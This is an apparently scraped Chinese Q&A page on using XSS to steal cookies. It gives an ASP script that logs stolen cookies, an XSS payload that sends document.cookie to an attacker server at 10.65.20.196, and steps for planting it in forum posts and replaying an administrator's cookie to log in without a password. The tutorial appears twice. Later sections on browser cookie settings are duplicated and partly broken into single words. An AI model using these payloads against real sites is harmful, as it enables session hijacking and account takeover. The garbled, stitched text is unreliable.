xss漏洞获取cookie怎么解决方案
XSS获取cookie并利用
获取cookie利用代码cookie.asp
html
titlexx/title
body
%testfile = Server.MapPath('code.txt') //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
msg = Request('msg') //获取提交过来的msg变量,也就是cookie值
set fs = server.CreateObject('scripting.filesystemobject')//创建一个fs对象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(''msg'')//像code.txt中写入获取来的cookie
thisfile.close() //关闭
set fs = nothing%
/body
/html
把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。
XSS构造语句
scriptwindow.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)/script
把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。。。。。。
简单步骤如下:
1、在存在漏洞的论坛中发日志:
X
2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了:
3、这是没有账户前的登陆界面:
4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据:
5、替换cookie后不用输用户名密码就顺利进入管理员账户了:
xss 打到cookie 怎么利用
XSS获取cookie并利用
获取cookie利用代码cookie.asp
html
titlexx/title
body
%testfile = Server.MapPath("code.txt") //先构造一个路径,也就是取网站根目录,创造一个在根目录下的code.txt路径,保存在testfile中
msg = Request("msg") //获取提交过来的msg变量,也就是cookie值
set fs = server.CreateObject("scripting.filesystemobject")//创建一个fs对象
set thisfile = fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""msg"")//像code.txt中写入获取来的cookie
thisfile.close() //关闭
set fs = nothing%
/body
/html
把上述文件保存为cookie.asp文件,放到你自己的网站服务器下。比如这里我们自己搭建的服务器为:http://10.65.20.196:8080。
XSS构造语句
scriptwindow.open('http://10.65.20.196:8080/cookie.asp?msg='+document.cookie)/script
把上述语句放到你找到的存在XSS的目标中,不过这里最好是存储型xss,比如你找到了某个博客或者论坛什么的存在存储型XSS,你在里面发一篇帖子或者留上你的评论,内容就是上述语句,当其他用户或者管理员打开这个评论或者帖子链接后,就会触发,然后跳转到http://10.65.20.196:8080/cookie.asp?msg='+document.cookie的页面,然后当前账户的coolie信息就当成参数发到你的网站下的文件里了。然后的然后你就可以那这个cookie登陆了。
xss劫持的cookie是当前网站的吗,?
截取的是你的网站的
xss真正的原理是将代码插入到某个网页里面,当浏览器访问这个网页的时候,就会执行你写的代码。如果这个代码具有获取cookies的功能,即可获得当前页面的cookies
然而不同的网站cookies是不同的,也是不允许互相访问的。这就要求你必须把xss代码插入到当前页面里面,并且能成为目标页面中的一部分代码被浏览器执行,这样才能成功获取对方的cookies(这样子程序是在对方网站的页面里面执行的,当然截取的就是对方网站的cookies)。而不是写一个连接,让别人打开你的网页(这样子程序就是在你的页面里面执行的,当然没啥效果)
qq邮箱的xss越来越少了,要知道腾讯的技术人员不是白吃饭的。想要xss不一定非要对qq邮箱下手,如果能在别的分站里面找到xss不一样是照打不误么?qq的页面那么多何必困在qq邮箱里面呢~
如何更改浏览器内的cookie设置
您使用
IE
6.0版本
请按
几
步骤启用cookie:
点击菜单条
"工具"(Tool)
展
菜单
选择
面
条"Internet选项"(Internet
Options)
打
Internet
选项设置窗口
顶
条标签栏
点击第三
"隐私"(Privacy)
"隐私"
设置
间偏
三
按钮
点击第二
按钮"高级"(Advanced)
弹
cookie设置窗口
勾选
设置:
覆盖自
cookie处理
(Override
automatic
cookie
handling)
第
cookie:接受
(First-party
cookies:
Accept)
第三
cookie:接受
(Third-party
cookies:
Accept)
总
允许
cookie
(Always
allow
session
cookies)
点击按钮"确定"(OK)
关闭cookie设置窗口
点击按钮"确定"(OK)
关闭Internet
选项设置窗口
您使用
IE
5.0版本
请按
几
步骤启用cookie:
点击菜单条
"工具"(Tool)
展
菜单
选择
面
条"Internet选项"(Internet
Options)
打
Internet
选项设置窗口
顶
条标签栏
点击第二
"安全"(Security)
"安全"
设置
间偏
两
按钮
点击按钮"自定义级别"(Customized)
弹
安全设置窗口
拉
滚
条
找
cookie设置
勾选
设置:
允许使用存储
您计算机
cookie:启用
允许使用每
cookie(未存储):启用
点击按钮"确定"(OK)
关闭安全设置窗口
点击按钮"确定"(OK)
关闭Internet
选项设置窗口
您使用
IE
4.0版本,请按
几
步骤启用cookie:
主菜单
选择
查看|Internet
选项...
更改至
安全
选项卡
选择
自定义
单击
设置...
向
滚
至
安全
部
启用
:选择
总
接受
cookie
启用
JavaScript
功能步骤:(
适用于Microsoft
Internet
Explorer)
1.
工具列
选[工具]-[Internet
选项]
2.选择[安全]
按[默认级别]
3.点击按钮
确定
(OK)
关闭Internet
选项设置窗口
4.关闭浏览器窗口
重新打
浏览器即
如何修改浏览器Cookie?
网站通过 Cookie 保存了我们访问网站的信息,在不同的浏览器中修改 Cookie 可以如下操作:
Firefox:
安装 Web Developer 插件,装完重启之后会出现一排新的工具栏,点击 Cookies - Add Cookie… 即可增加/修改一个Cookie了。
另 Edit Cookies 插件也可直接修改COOKIE
Opera:
Opera 可以在 菜单 - 工具 - 高级 - Cookie… 对话框中找到当前的页面的 Cookie 项,选中以后点“编辑…”即可修改。如果修改不成功的话,有可能是因为启用了 Opera Turbo 加速器导致的,可以检查 菜单 - 工具 - 快速参数(F12) - 启动Opera Turbo 是否开启,如开启着的话,把它关闭以后再试试是不是可以了。
Chrome:
安装 Edit This Cookie 插件,之后点击插件图标即可操作 Cookie。
IE:
可以用 IECookiesView 碰碰运气,如果有其他更好的办法也请告知。
除上述工具之外,免费工具Fiddler 和商业软件 HttpWatch 可以通过设置断点,跨浏览器调试所有的 HTTP(S)流量,很好很强大。只是需要写脚本,就改 Cookie 这个功能没有上述专门的工具来的方便,有杀鸡用牛刀之嫌。
如何使用xss平台盗取cookie
截取的是你的网站的 xss真正的原理是将代码插入到某个网页里面,当浏览器访问这个网页的时候,就会执行你写的代码。如果这个代码具有获取cookies的功能,即可获得当前页面的cookies 然而不同的网站cookies是不同的,也是不允许互相访问的。
如何修改浏览器Cookie
网站通过 Cookie 保存了我们访问网站的信息,在不同的浏览器中修改 Cookie 可以如下操作:
Firefox:
安装 Web Developer 插件,装完重启之后会出现一排新的工具栏,点击 Cookies - Add Cookie… 即可增加/修改一个Cookie了。
另 Edit Cookies 插件也可直接修改COOKIE
Opera:
Opera 可以在 菜单 - 工具 - 高级 - Cookie… 对话框中找到当前的页面的 Cookie 项,选中以后点“编辑…”即可修改。如果修改不成功的话,有可能是因为启用了 Opera Turbo 加速器导致的,可以检查 菜单 - 工具 - 快速参数(F12) - 启动Opera Turbo 是否开启,如开启着的话,把它关闭以后再试试是不是可以了。
Chrome:
安装 Edit This Cookie 插件,之后点击插件图标即可操作 Cookie。
IE:
可以用 IECookiesView 碰碰运气,如果有其他更好的办法也请告知。
除上述工具之外,免费工具Fiddler 和商业软件 HttpWatch 可以通过设置断点,跨浏览器调试所有的 HTTP(S)流量,很好很强大。只是需要写脚本,就改 Cookie 这个功能没有上述专门的工具来的方便,有杀鸡用牛刀之嫌。